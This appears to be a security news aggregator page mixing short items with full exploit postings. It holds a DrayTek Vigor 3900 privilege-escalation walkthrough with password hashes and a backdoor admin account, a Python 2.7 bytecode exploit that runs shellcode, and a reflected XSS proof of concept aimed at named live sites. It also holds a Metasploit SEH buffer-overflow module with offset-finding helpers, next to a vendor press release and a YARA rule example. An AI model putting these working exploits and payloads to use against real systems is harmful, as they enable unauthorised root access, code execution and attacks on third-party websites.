Channel: BOT24

How to probe ip_forward option on remote hosts?


On a local network, I thought about a way to tell whether a remote host acts as a gateway or not. In other words, it remotely probes the content of the target's "/proc/sys/net/ip_forward" (the sysctl that enables or disables IP forwarding). This is useful when you join an unfamiliar network and want to find out which host is the default gateway.

The trick is to send an ICMP echo request whose IP destination is an arbitrary host, while forging the destination MAC address of the Ethernet header to be the MAC address of the remote target. The frame is therefore handled first by the target, which must either forward the packet on towards its real destination (ip_forward enabled) or drop it (ip_forward disabled).

Read more: http://vladz.devzero.fr/007_isgate.php
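As an added illustration (not code from the linked post), here is the probe frame described above built by hand in Python: the Ethernet destination is the target's MAC while the IP destination is some other host, so the target's kernel has to decide whether to forward. The MAC and IP addresses, interface name and ICMP identifier are constructed values; only target_forwards touches the network, and it needs Linux and CAP_NET_RAW.

```python
import socket
import struct

# Constructed values for the example; nothing below is taken from the original post.
PROBER_MAC = "02:00:00:00:00:01"   # our NIC
TARGET_MAC = "02:00:00:00:00:02"   # host whose ip_forward setting we want to infer
PROBER_IP = "192.168.0.10"
OTHER_IP = "192.168.0.20"          # any other live host; the target must route to reach it
PROBE_ID = 0x1337


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def build_probe(prober_mac, target_mac, prober_ip, other_ip,
                ident=PROBE_ID, seq=1, icmp_type=8, payload=b"isgate?"):
    """Ethernet frame for target_mac carrying an ICMP echo whose IP destination is other_ip."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    fields = [0x45, 0, 20 + len(icmp), 0, 0, 64, socket.IPPROTO_ICMP, 0,
              socket.inet_aton(prober_ip), socket.inet_aton(other_ip)]
    fields[7] = checksum(struct.pack("!BBHHHBBH4s4s", *fields))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", *fields)
    eth_hdr = mac_bytes(target_mac) + mac_bytes(prober_mac) + b"\x08\x00"
    return eth_hdr + ip_hdr + icmp


def parse_frame(frame: bytes) -> dict:
    """Decode the fields the probe cares about (assumes a 20-byte IPv4 header, no options)."""
    ip_hdr = frame[14:34]
    total_len = struct.unpack("!H", ip_hdr[2:4])[0]
    icmp = frame[34:14 + total_len]       # ignore any Ethernet padding after the datagram
    return {
        "dst_mac": ":".join("%02x" % b for b in frame[0:6]),
        "src_mac": ":".join("%02x" % b for b in frame[6:12]),
        "ethertype": struct.unpack("!H", frame[12:14])[0],
        "ip_src": socket.inet_ntoa(ip_hdr[12:16]),
        "ip_dst": socket.inet_ntoa(ip_hdr[16:20]),
        "ip_checksum_ok": checksum(ip_hdr) == 0,
        "icmp_type": icmp[0],
        "icmp_id": struct.unpack("!H", icmp[4:6])[0],
        "icmp_checksum_ok": checksum(icmp) == 0,
    }


def is_reply_to_probe(frame: bytes, ident: int = PROBE_ID) -> bool:
    """An echo reply carrying our identifier can only exist if the target forwarded the probe."""
    if len(frame) < 42:
        return False
    f = parse_frame(frame)
    return (f["ethertype"] == 0x0800 and f["icmp_type"] == 0
            and f["icmp_id"] == ident and f["icmp_checksum_ok"])


def target_forwards(frame: bytes, iface: str, timeout: float = 2.0) -> bool:
    """Linux only, needs CAP_NET_RAW: send the frame and wait for the echo reply."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
    sock.bind((iface, 0))
    sock.settimeout(timeout)
    try:
        sock.send(frame)
        while True:
            if is_reply_to_probe(sock.recv(65535)):
                return True
    except socket.timeout:
        return False
    finally:
        sock.close()


if __name__ == "__main__":
    probe = build_probe(PROBER_MAC, TARGET_MAC, PROBER_IP, OTHER_IP)
    print("ip_forward=1" if target_forwards(probe, "eth0")
          else "no reply (ip_forward=0, or forwarded but filtered)")
```

A reply proves forwarding; silence does not prove it is off. The target may forward but filter ICMP, rp_filter may discard a frame whose IP destination it would not normally see, or the chosen destination may simply be down, so probe a couple of destinations before drawing a conclusion.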

IBM X-Force 2012 Annual Trend & Risk report has been released


It is always exciting to be able to announce the next version of the IBM X-Force® Trend & Risk report, and today we are announcing the full-year 2012 findings and key highlights researched by IBM X-Force.

One of the differentiators that we observed across various attacker efforts was that by targeting vulnerabilities in cross-platform frameworks, and building on a solid foundation of tried-and-true attack techniques, attackers are achieving a greater return on exploit development in 2012.

Looking back over the year, there was a measurable increase in the public announcements of security incidents and breaches, where SQL injection and DDoS attacks continued to wreak havoc on IT infrastructures.

Over the past year, everything from the discovery of sophisticated toolkits with ominous names like Flame to cross-platform zero-day vulnerabilities had both consumers and corporations inundated with advisories and alerts regarding emerging threats. The frequency of data breaches and incidents, which had already hit a new high in 2011, continued its upward trajectory.


Read more: http://blogs.iss.net/archive/2012-XFTR-EOY.html

Draytek Vigor 3900 1.06 - Privilege Escalation


# Exploit Title: Privilege escalation
# Date: 19/3/2013
# Exploit Author: Mohammad abou hayt
# Vendor Homepage: http://www.draytek.com.tw/index.php?option=com_k2&view=item&layout=item&id=2627&Itemid=593&lang=en
# Software Link: N/A
# Version: Vigor 3900 -Hardware V2 - firmware latest 1.06

######################## Privilege escalation for DrayTek Vigor 3900 #####################

######################## Affected device description: ####################################
Vigor 3900 Router Firewall:
High Performance Multi-WAN VPN Appliance
The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performance applications including remote access, firewalling, load-balancing and
failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
feature set.
######## For multi-tenant or departmental flexibility, the Vigor3900 supports multiple LAN IP subnets, together with VLAN capabilities and user management,
providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure efficiency.

############################Advisory:###################################################

# The finding started when creating a normal limited user (or any user at all) to access the firewall dashboard.


## Port 22 is open by default, so log in to the firewall over SSH (PuTTY was used here) with this limited user's credentials:

login as: test
test@192.168.0.1 password:

********************************************
*                                          *
*                Welcome V3900             *
*                                          *
********************************************

Welcome it is Thu Mar 28 18:58:31 UTC 2013
Vigor3900>



### The Vigor 3900 is built on BusyBox. From the restricted CLI, running "sh draytekv3900" drops into a root shell without asking for any credential.
#### I also noticed that any user created from the dashboard, however limited, can reach this root shell the same way.

Vigor3900> sh draytekv3900


BusyBox v1.4.2 (2013-02-25 23:52:19 CST) Built-in shell (ash)
Enter 'help' for a list of built-in commands.


##### Printing /etc/passwd

~ # cat /etc/passwd
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish



####### Adding another admin (admin1)

~ # vi /etc/passwd
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
admin1:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish

:wq
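An added check, not part of the advisory: a small audit of a BusyBox-style /etc/passwd that flags what the steps above leave behind (two accounts with UID 500, a hash copied verbatim between accounts) and the weakness that makes the copy trivial in the first place (password hashes kept in world-readable /etc/passwd rather than /etc/shadow). The sample is the advisory's post-modification listing; the finding names are this example's own.

```python
import re
from collections import defaultdict

# The advisory's listing after the admin1 line was added (hash values as printed there).
SAMPLE_PASSWD = """\
root:!:0:0:root:/tmp:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish
quagga:x:51:51:quagga:/tmp/.quagga:/bin/false
admin1:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish
test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish
"""

# $1$<salt, up to 8 chars>$<22-char hash>: the MD5-crypt form BusyBox writes.
MD5_CRYPT = re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")
LOCKED = {"!", "*", "x", ""}   # no usable hash in this field


def parse_passwd(text):
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell, "line": lineno})
    return entries


def audit(entries):
    """Return (finding, subject) pairs; the finding names are this example's own."""
    findings = []
    by_uid = defaultdict(list)
    by_hash = defaultdict(list)
    for e in entries:
        by_uid[e["uid"]].append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("extra_uid0", e["name"]))
        if e["pw"] in LOCKED:
            continue
        # A hash in /etc/passwd is readable by every local account, which is what
        # lets a shell user copy admin's line verbatim; it belongs in /etc/shadow.
        findings.append(("hash_in_passwd", e["name"]))
        if not MD5_CRYPT.match(e["pw"]):
            findings.append(("malformed_hash", e["name"]))
        by_hash[e["pw"]].append(e["name"])
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append(("shared_uid", "%d:%s" % (uid, ",".join(sorted(names)))))
    for names in by_hash.values():
        if len(names) > 1:
            findings.append(("shared_hash", ",".join(sorted(names))))
    return findings


if __name__ == "__main__":
    for kind, subject in audit(parse_passwd(SAMPLE_PASSWD)):
        print("%-15s %s" % (kind, subject))
```

On a device like this the same check is worth running periodically against a copy of the file pulled over SSH: a new line sharing UID 500 with admin is exactly the artefact the procedure above creates.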

____________________________________________________________


Discovered and written by: Mohammad Abou Hayt

__________________________________________________




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information



How you can abuse the Python VM to execute x86 codes for fun


#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# abuse_python27_vm_to_execute_x86_code.py - Python 2.7 opcodes & x86 shellcodes = funz
# Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# https://twitter.com/elvanderb/status/162551396015669248 -- Challenge accepted mate!
#
# Requires a 32-bit CPython 2.7: the 0x14 and 0xC offsets below are that build's
# PyStringObject / PyTupleObject layouts, and pointers are packed as 4 bytes.

import struct
import types
import opcode
import platform
import sys


def pack_ushort(us):
    return struct.pack('<H', us)


def pack_uint(ui):
    return struct.pack('<I', ui)


def get_opcode(o):
    return chr(opcode.opmap[o])


def exec_x86_shellcodes_via_python27_opcodes_(addr_x86_code):
    """Execute native x86 code abusing the Python VM"""

    def pull_the_trigger_b1tch():
        """Pull the trigger motherfucker"""
        pass

    const_tuple = ()
    addr_const_tuple = id(const_tuple)

    # Fake function object: 0x40 bytes of padding, then the "code pointer" that
    # CALL_FUNCTION will end up jumping through, i.e. the shellcode address.
    first_indirection = 'A' * 0x40 + pack_uint(addr_x86_code)
    addr_first_indirection = id(first_indirection)
    addr_first_indirection_controled_data = addr_first_indirection + 0x14

    fake_object = 'AAAA' + pack_uint(addr_first_indirection_controled_data)
    addr_fake_object = id(fake_object)
    addr_fake_object_controled = addr_fake_object + 0x14

    # In LOAD_CONST:
    # CPU Disasm
    # Address   Hex dump       Command                           Comments
    # 1E011389  8B4C24 7C      MOV ECX,DWORD PTR [ESP+7C]
    # 1E01138D  8B7C99 0C      MOV EDI,DWORD PTR [EBX*4+ECX+0C]  # EDI will be the 0xdeadbeef
    # 1E011391  8B4424 0C      MOV EAX,DWORD PTR [ESP+0C]
    # 1E011395  FF07           INC DWORD PTR [EDI]
    # 1E011397  8938           MOV DWORD PTR [EAX],EDI

    ptr_object = pack_uint(addr_fake_object_controled)
    addr_ptr_object = id(ptr_object)
    addr_ptr_data_controled = addr_ptr_object + 0x14

    # Compute the offset
    # Remember:
    # 1E01138D  8B7C99 0C      MOV EDI,DWORD PTR [EBX*4+ECX+0C] ; ECX is the address of the const_tuple object, EBX you control!
    assert((addr_ptr_data_controled - addr_const_tuple - 0xC) % 4 == 0)

    offset = ((addr_ptr_data_controled - addr_const_tuple - 0xC) & 0xffffffff) / 4
    offset_high, offset_low = offset >> 16, offset & 0xffff

    # 1. EXTENDED_ARG supplies the high 16 bits of the 32-bit index
    evil_bytecode = get_opcode('EXTENDED_ARG') + pack_ushort(offset_high)
    # 2. LOAD_CONST with the low 16 bits: loads an "object" from the const: This is an evil object :]
    evil_bytecode += get_opcode('LOAD_CONST') + pack_ushort(offset_low)
    # 3. Call the function on the top of stack: The evil function object :]
    evil_bytecode += get_opcode('CALL_FUNCTION') + '\x00\x00'

    pull_the_trigger_b1tch.func_code = types.CodeType(
        0,              # argcount
        0,              # nlocals
        0,              # stacksize
        0,              # flags
        evil_bytecode,  # codestring
        const_tuple,    # constants
        (),             # names
        (),             # varnames
        "",             # filename
        "",             # name
        0,              # firstlineno
        ""              # lnotab
    )

    # and b00m!1§1§1§
    pull_the_trigger_b1tch()


def main(argc, argv):
    sh = None
    system = platform.system()

    if system == 'Windows':
        # Windows/x86 - calc.exe shellcode
        sh = '\xda\xc3\xba\x2d\xae\x01\x6b\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x33\x83\xed\xfc\x31\x55\x13\x03\x78\xbd\xe3\x9e\x7e\x29\x6a\x60\x7e\xaa\x0d\xe8\x9b\x9b\x1f\x8e\xe8\x8e\xaf\xc4\xbc\x22\x5b\x88\x54\xb0\x29\x05\x5b\x71\x87\x73\x52\x82\x29\xbc\x38\x40\x2b\x40\x42\x95\x8b\x79\x8d\xe8\xca\xbe\xf3\x03\x9e\x17\x78\xb1\x0f\x13\x3c\x0a\x31\xf3\x4b\x32\x49\x76\x8b\xc7\xe3\x79\xdb\x78\x7f\x31\xc3\xf3\x27\xe2\xf2\xd0\x3b\xde\xbd\x5d\x8f\x94\x3c\xb4\xc1\x55\x0f\xf8\x8e\x6b\xa0\xf5\xcf\xac\x06\xe6\xa5\xc6\x75\x9b\xbd\x1c\x04\x47\x4b\x81\xae\x0c\xeb\x61\x4f\xc0\x6a\xe1\x43\xad\xf9\xad\x47\x30\x2d\xc6\x73\xb9\xd0\x09\xf2\xf9\xf6\x8d\x5f\x59\x96\x94\x05\x0c\xa7\xc7\xe1\xf1\x0d\x83\x03\xe5\x34\xce\x49\xf8\xb5\x74\x34\xfa\xc5\x76\x16\x93\xf4\xfd\xf9\xe4\x08\xd4\xbe\x1b\x43\x75\x96\xb3\x0a\xef\xab\xd9\xac\xc5\xef\xe7\x2e\xec\x8f\x13\x2e\x85\x8a\x58\xe8\x75\xe6\xf1\x9d\x79\x55\xf1\xb7\x19\x38\x61\x5b\xf0\xdf\x01\xfe\x0c'
    elif system == 'Linux':
        # Linux/x86 - execve /bin/sh - 21 bytes
        sh = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
    else:
        sh = '\xcc'

    # The string of a PyStringObject is stored at the offset 0x14
    # typedef struct
    # {
    #     PyObject_VAR_HEAD
    #     long ob_shash;
    #     int ob_sstate;
    #     char ob_sval[1]; // <- OUR STR1NGZ
    # } PyStringObject;
    address_shellcode = id(sh) + 0x14
    exec_x86_shellcodes_via_python27_opcodes_(address_shellcode)


if __name__ == '__main__':
    sys.exit(main(len(sys.argv), sys.argv))
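The script only works on 32-bit CPython 2.7: the 0x14 and 0xC offsets are that build's PyStringObject and PyTupleObject layouts, and LOAD_CONST there indexes co_consts with no bounds check. As an added illustration, independent of the script, the Python 3 helpers below encode and decode its three-opcode payload so the index arithmetic can be checked without executing anything: EXTENDED_ARG carries the high 16 bits, LOAD_CONST the low 16, and the & 0xffffffff turns a negative distance between the constant tuple and the controlled string into the 32-bit wrap the LOAD_CONST addressing relies on. The opcode numbers are CPython 2.7's; the addresses in the worked call are made up.

```python
import struct

# CPython 2.7 opcode numbers (from that interpreter's opcode.h; 3.x renumbered them).
OPCODES_27 = {"EXTENDED_ARG": 145, "LOAD_CONST": 100, "CALL_FUNCTION": 131}
OPNAMES_27 = {num: name for name, num in OPCODES_27.items()}
HAVE_ARGUMENT_27 = 90          # opcodes >= 90 take a 16-bit little-endian operand


def const_index_for(addr_controlled, addr_const_tuple):
    """Index N such that LOAD_CONST N reads the pointer stored at addr_controlled.

    The disassembly quoted in the script reads [ECX + EBX*4 + 0xC] with ECX = the
    co_consts tuple and EBX = N; 0xC is ob_item[0] in a 32-bit PyTupleObject.
    Masking with 0xffffffff is what lets a string that lives *below* the tuple
    still be reached: the index simply wraps around 32-bit address space.
    """
    delta = addr_controlled - addr_const_tuple - 0xC
    if delta % 4:
        raise ValueError("controlled pointer must be 4-byte aligned relative to the tuple")
    return (delta & 0xFFFFFFFF) // 4


def encode_payload(index):
    """EXTENDED_ARG hi16 ; LOAD_CONST lo16 ; CALL_FUNCTION 0 -- the script's evil_bytecode."""
    if not 0 <= index <= 0xFFFFFFFF:
        raise ValueError("index does not fit the 32-bit operand EXTENDED_ARG can build")
    hi, lo = index >> 16, index & 0xFFFF
    code = b""
    if hi:
        code += bytes([OPCODES_27["EXTENDED_ARG"]]) + struct.pack("<H", hi)
    code += bytes([OPCODES_27["LOAD_CONST"]]) + struct.pack("<H", lo)
    code += bytes([OPCODES_27["CALL_FUNCTION"]]) + struct.pack("<H", 0)
    return code


def disassemble_27(code):
    """Walk 2.7 bytecode, folding EXTENDED_ARG into the next opcode's operand."""
    listing, i, extended = [], 0, 0
    while i < len(code):
        op = code[i]
        i += 1
        name = OPNAMES_27.get(op, "op%d" % op)
        if op < HAVE_ARGUMENT_27:
            listing.append((name, None))
            continue
        arg = struct.unpack("<H", code[i:i + 2])[0] | (extended << 16)
        i += 2
        extended = arg if name == "EXTENDED_ARG" else 0
        listing.append((name, arg))
    return listing


if __name__ == "__main__":
    # Made-up 32-bit addresses: the controlled string sits above the tuple here.
    index = const_index_for(0x0A0B0C10, 0x0A000000)
    print(hex(index), disassemble_27(encode_payload(index)))
```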

Voila CMS Cross Site Scripting


#####################
#Exploit Title: Voila CMS XSS Vulnerability
#Exploit Author:Darksnipper & Dr.v!ru$
#Home:www.cybercoders.org
#Email:Darksnipper@live.com
#Cms Link:http://www.voilasyria.com
#Tested On: Windows 7 & Linux
#Dork:intext:powerd by voila
#P.o.c
Open
http://site.com/path/view/search/viewSearch.php
and enter the following in the search bar:
<script>alert("xss by Darksnipper")</script>

If the alert box appears, the search input is reflected unescaped and the site is vulnerable to XSS.

Demo:
http://voitest.com/ithad/view/search/viewSearch.php
Put the payload in the search box:
<script>alert("xss by Darksnipper")</script>
Example No. 2:
http://www.arabengineeringindustries.org/view/search/viewSearch.php
Put the same payload in the search box and click the button beside it:
<script>alert("xss by Darksnipper")</script>

#Greetz:Dream.killer,Soul~Inj3ct0r,Error
Haxor,1337,H4xorl1f3,shadow008,x3o-1337,SOG,Dr.z0mbie,P4k-command3r,Over-x,Zhc
Snipper,Asif Iqbal,Junaid Hussain,Madc0de Haxor,Code Smasher,Z company
Hacking Crew, Kashmiri Hackers,Madleets Team,PakHack Team,3xp1r3 Cyber
Army & All Freedom Fighters.
#####################





Metasploit; ALLMediaServer 0.94 Buffer Overflow


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLMediaServer 0.94 Buffer Overflow Exploit',
      'Description'    => %q{
          This module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability
          is caused by a boundary error in the handling of HTTP requests.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom<metacom27[at]gmail.com>',  # Original discovery
          '<metacom>',                        # MSF Module
          'RST',
        ],
      'References'     =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ],
          [ 'CVE', 'insert CVE number here' ],
          [ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', # none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00", # <change if needed>
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Windows 7', # Tested on: Windows 7 SP1/SP0
            {
              'Ret'    => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll
              'Offset' => 1065
            }
          ],
        ],
      'Privileged'     => false,
      # Correct Date Format: "M D Y"
      # Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate' => 'Mar 28 2013',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(888)], self.class)
  end

  def exploit
    connect

    buffer  = "http://"
    buffer << rand_text(target['Offset'])      # junk up to the SEH record
    buffer << generate_seh_record(target.ret)  # nSEH + SEH (pop/pop/ret in avcodec-53.dll)
    buffer << payload.encoded                  # 3931 bytes of space
    # more junk may be needed to trigger the exception

    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)

    handler
    disconnect
  end
end
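The 'Offset' => 1065 and the SEH record the module sends come from the usual SEH workflow: send a cyclic pattern, read the four bytes that landed in the exception handler slot, look up their position. As an added example, not part of the module, the Python below implements that pattern (Metasploit's Aa0Aa1... scheme), the offset lookup from either the raw bytes or the little-endian DWORD a debugger shows, and the request layout the module builds (prefix, junk, nSEH, SEH, payload). The nSEH bytes are the conventional short jump over the handler pointer and an assumption here; Metasploit's generate_seh_record picks its own filler.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...; every 4-byte window is unique
    for the first 20280 bytes, which is what makes the offset lookup unambiguous."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        chunks.append(upper + lower + digit)
        if 3 * len(chunks) >= length:
            break
    return "".join(chunks)[:length].encode()


def pattern_offset(pattern, value):
    """Position of `value` in the pattern; value is the 4 bytes that overwrote the
    handler, or the little-endian DWORD a debugger displays for it. -1 if absent."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return pattern.find(value)


def seh_record(handler_addr, nseh=b"\xeb\x06\x90\x90"):
    """nSEH (short jmp +6 over the handler pointer; filler bytes are an assumption)
    followed by the pop/pop/ret address, little-endian."""
    return nseh + struct.pack("<I", handler_addr)


def build_request(offset, handler_addr, payload, prefix=b"http://", junk=b"A"):
    """Same layout as the module: prefix, `offset` bytes of junk, SEH record, payload."""
    return prefix + junk * offset + seh_record(handler_addr) + payload


if __name__ == "__main__":
    # Stage 1: send pattern_create(4000) after "http://" and note the handler value in
    # the debugger (constructed here instead of read from a crash), then recover the offset.
    crashing = pattern_create(4000)
    seen_in_handler = struct.unpack("<I", crashing[1065:1069])[0]
    print("offset", pattern_offset(crashing, seen_in_handler))
    # Stage 2: rebuild with the real SEH record and a payload.
    print("request length", len(build_request(1065, 0x65EC24CA, b"\xcc" * 16)))
```

Two checks worth making before trusting the offset: the pattern must be longer than the overflow needs (the module allows 3931 bytes after the record) and the DWORD must be read from the SEH chain, not from EIP, since on an SEH overwrite EIP usually points into the original handler code.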




LDRA Extends Integration with MATLAB and Simulink, Verifying the Model at Object Code Level


To boost the quality and efficiency of safety-critical design, the LDRA tool suite now analyzes, instruments and assesses code coverage of both source and object code during the model phase of development
DESIGN West 2013
WIRRAL, England--(BUSINESS WIRE)--LDRA, the leader in standards compliance, automated software verification, source code analysis and test tools, now offers unprecedented verification of the model through a sophisticated integration with MATLAB and Simulink. The LDRA tool suite can now use real-world data from MATLAB that’s connected to a Simulink model in order to fully verify the application at a source and object code level. Developers can fine-tune the model to reflect a data-driven flow of information, reducing the amount of error-prone manual manipulation necessary for the model-generated code to achieve DO-178C, Level A certification.
The most critical levels of certification require comprehensive testing of an application by independent analysis not only at the source code level, but also at the machine code assembler level. While model-driven development typically ensures consistent code, verification previously required many more steps. Developers could verify the model, but to ensure the model-generated code properly managed a real-world situation, the code had to be extracted, instrumented, connected to an execution harness, and executed against functional verification data. Discrepancies in the functionality required developers to rework the model and manually manipulate the code. Not until the developer could prove that every line of code had been fully tested could an application be submitted for Level A certification.
LDRA Proves Functionality at the Model Level
Thanks to the integration with MATLAB and Simulink, customers can run real-world code generated by Embedded Coder in software in the loop (SIL) and processor in the loop (PIL) simulations. The LDRA tool suite will then analyze both the source and object codes entirely inside the same LDRA framework. LDRA acts as an independent verification layer, working within the MATLAB and Simulink environment. By applying data from models, developers can better understand how various components of the application interact with each other. Defects in the design can be identified, and changes made to the model directly, eliminating many hours of error-prone iterations between the model, code and data.
“Because Model-Based Design generates code automatically and saves development time, we continue to look for ways to test the code automatically and save verification time,” stated Tom Erkkinen, Embedded Applications Manager, MathWorks. “The integration of MATLAB and Simulink with the LDRA tool suite enables developers to reuse their requirements-based model simulation test framework now on the executable object code. This improves the efficiency and quality of code while continuing to meet the highest criteria of industry certification.”
“Rigorous verification of the safety-critical systems found in avionics, defense and high-speed rail have resulted in stellar safety records, but at a significant financial and time-to-market cost,” noted Ian Hennell, LDRA Operations Director. “Through this integration, LDRA gives companies a way to maintain best-of-breed software practices and quality while better managing the work flow, schedule and cost of development.”
Graphical Debug and Process Automation Speed Development
The integration enables the LDRA tool suite to perform verification to the object code level through Simulink-based testing. The LDRA tool suite can then verify that any discrepancies between source and object code caused by compiler or program optimization are corrected in the model. Because the developers are working in the model, the relationships between application components and data elements are transparent. In addition, direct integration of object code coverage enables developers to perform DO-178C object code verification early in the development process.
Such automation and elimination of manual steps enables companies to achieve the most rigorous certification levels from their Simulink models. Developers can prove that their applications have been fully tested down to the object code level, fulfilling the demands of DO-178C, Level A. By beginning the certification process for Level A projects early in the design lifecycle, any issues with compilers generating invalid or extraneous object code are identified and addressed early. Without this capability, object code verification errors are discovered late in the design lifecycle and can delay product release.
While such testing does not obviate the need to test the application in an integrated environment, it does ensure that most, if not all, application defects are identified and corrected prior to this stage. Given the cost and the limited availability of hardware components, the integration of the LDRA tool suite with Simulink and MATLAB ensures that the application can evolve to an advanced level of code maturity and quality before being exercised on the target system. This level of control shortcuts project overruns in both time and cost.
A demonstration of the LDRA and MathWorks integration will be presented at Booth 2138 at Design West 2013 from April 23 to 25 in San Jose, California.
About LDRA
For more than forty years, LDRA has developed and driven the market for software that automates code analysis and software testing for safety-, mission-, security- and business-critical markets. Working with clients to achieve early error identification and full compliance with industry standards, LDRA traces requirements through static and dynamic analysis to unit testing and verification for a wide variety of hardware and software platforms. Boasting a worldwide presence, LDRA is headquartered in the UK with subsidiaries in the United States, India and an extensive distributor network. For more information on the LDRA tool suite, please visit www.ldra.com.
Please send reader enquiries to:
Mark James
Email: mark.james@ldra.com
MATLAB and Simulink are registered trademarks of The MathWorks, Inc. See www.mathworks.com/trademarks for a list of additional trademarks. Other product or brand names may be trademarks or registered trademarks of their respective holders.

Contacts

Media:
Hughes Communications, Inc.
Janice Hughes, 705-549-8952 or 705-774-8686 (Mobile)
Media Relations
janice@hughescom.net
or
LDRA
Mark James, +44 (0)151 649 9300
Marketing Manager
mark.james@ldra.com

YARA 1.7 release- tool aimed at helping malware researchers to identify and classify malware samples


YARA in a nutshell

YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. Let's see an example:
rule silent_banker : banker
{
    meta:
        description = "This is just an example"
        thread_level = 3
        in_the_wild = true

    strings:
        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}
